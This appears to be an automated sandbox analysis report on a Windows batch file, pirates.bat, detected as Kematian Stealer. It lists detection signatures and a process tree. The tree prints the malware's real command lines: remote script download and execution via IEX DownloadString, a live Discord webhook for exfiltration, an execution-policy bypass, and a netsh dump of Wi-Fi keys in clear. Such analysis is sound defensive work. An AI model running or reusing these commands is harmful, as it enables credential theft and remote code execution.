Edit tour
Windows
Analysis Report
pirates.bat
Overview
General Information
Detection
Kematian Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Kematian Stealer
Yara detected PowerShell ScreenShot
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Found Tor onion address
Found large BAT file
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious javascript / visual basic script found (invalid extension)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to dump wireless credentials
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Wscript called in batch mode (surpress errors)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Steals Internet Explorer cookies
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 2896 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\pirat es.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cscript.exe (PID: 6712 cmdline:
cscript // nologo tem p.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD) - cmd.exe (PID: 3120 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\pirat es.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - findstr.exe (PID: 2840 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 7176 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho C:\Wind ows\system 32\cmd.exe /c ""C:\U sers\user\ Desktop\pi rates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7188 cmdline:
find /i "C :\Users\us er\Desktop \pirates.b at" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 7212 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7232 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 7248 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho C:\Wind ows\system 32\cmd.exe /c ""C:\U sers\user\ Desktop\pi rates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7256 cmdline:
find /i "C :\Users\us er\Desktop \pirates.b at" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 7280 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho C:\Wind ows\system 32\cmd.exe /c ""C:\U sers\user\ Desktop\pi rates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7288 cmdline:
find /i "C :\Users\us er\Desktop \pirates.b at" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 7324 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - chcp.com (PID: 7340 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - powershell.exe (PID: 7364 cmdline:
powershell .exe -nop -c "Write- Host -NoNe wLine $nul l" MD5: 04029E121A0CFA5991749937DD22A1D9) - findstr.exe (PID: 7488 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - net.exe (PID: 7504 cmdline:
net sessio n MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7520 cmdline:
C:\Windows \system32\ net1 sessi on MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - powershell.exe (PID: 7536 cmdline:
powershell -c "$t = Iwr -Uri ' https://ra w.githubus ercontent. com/Childr enOfYahweh /Kematian- Stealer/ma in/fronten d-src/main .ps1' -Use BasicParsi ng; $t -re place 'YOU R_WEBHOOK_ HERE', 'ht tps://disc ord.com/ap i/webhooks /124108864 5289480213 /oPJqqAoSq wRaK2J4O5X SC-DuGKqcF Dvi3TJVq0b T27LsTvxCe lwX2kreM6J wT15zQIyC' | Out-Fil e -FilePat h 'kematia n.ps1' -En coding ASC II" MD5: 04029E121A0CFA5991749937DD22A1D9) - doskey.exe (PID: 7684 cmdline:
doskey CAL L=SHIFT MD5: F6D134052BCB12103B729E4D2EA15B91) - attrib.exe (PID: 7700 cmdline:
attrib +h +s kematia n.ps1 MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - cmd.exe (PID: 7720 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho C:\Wind ows\system 32\cmd.exe /c ""C:\U sers\user\ Desktop\pi rates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7728 cmdline:
find /i "C :\Users\us er\Desktop \pirates.b at" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 7752 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7776 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 7792 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho C:\Wind ows\system 32\cmd.exe /c ""C:\U sers\user\ Desktop\pi rates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7800 cmdline:
find /i "C :\Users\us er\Desktop \pirates.b at" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 7820 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - powershell.exe (PID: 7840 cmdline:
powershell -NoLogo - NoProfile -Execution Policy Byp ass -Comma nd "$bytes = [System .IO.File]: :ReadAllBy tes('C:\Us ers\user\D esktop\pir ates.bat') ; if (($b ytes[0] -n e 0xFF) -o r ($bytes[ 1] -ne 0xF E)) { Writ e-Host 'Th e first 3 bytes of t he file ar e not FF F E 0A.' ; t askkill /F /IM cmd.e xe }" MD5: 04029E121A0CFA5991749937DD22A1D9) - findstr.exe (PID: 8068 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \pirates.b at" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 8100 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho C:\Wind ows\system 32\cmd.exe /c ""C:\U sers\user\ Desktop\pi rates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 8108 cmdline:
find /i "C :\Users\us er\Desktop \pirates.b at" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - powershell.exe (PID: 8132 cmdline:
powershell Set-Execu tionPolicy -Scope Cu rrentUser -Execution Policy Unr estricted -Force MD5: 04029E121A0CFA5991749937DD22A1D9) - wscript.exe (PID: 7248 cmdline:
wscript /b MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7296 cmdline:
powershell -noprofil e -executi onpolicy b ypass -Win dowStyle h idden -fil e kematian .ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - WmiPrvSE.exe (PID: 7428 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - netsh.exe (PID: 7584 cmdline:
"C:\Window s\system32 \netsh.exe " wlan exp ort profil e folder=C :\Users\us er\AppData \Local\Tem p\wifi key =clear MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - powershell.exe (PID: 7624 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" I'E'X((New -Object Ne t.Webclien t)."DowNlo AdSTRiNg"( 'https://g ithub.com/ Somali-Dev s/Kematian -Stealer/r aw/main/fr ontend-src /webcam.ps 1')) MD5: 04029E121A0CFA5991749937DD22A1D9) - csc.exe (PID: 7752 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\hvw5rq qp\hvw5rqq p.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 3052 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES4A61.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\hvw 5rqqp\CSC9 0E3CD70A79 D45AA9723B EFA972FDA5 B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - powershell.exe (PID: 3852 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" I'E'X((New -Object Ne t.Webclien t)."DowNlo AdSTRiNg"( 'https://g ithub.com/ Somali-Dev s/Kematian -Stealer/r aw/main/fr ontend-src /kematian_ shellcode. ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_PowerShellScreenShot | Yara detected PowerShell ScreenShot | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
JoeSecurity_KematianStealer | Yara detected Kematian Stealer | Joe Security | ||
JoeSecurity_KematianStealer | Yara detected Kematian Stealer | Joe Security | ||
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
Click to see the 12 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
MALWARE_Win_PWSH_PoshWiFiStealer | Detects PowerShell PoshWiFiStealer | ditekSHen |
|
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |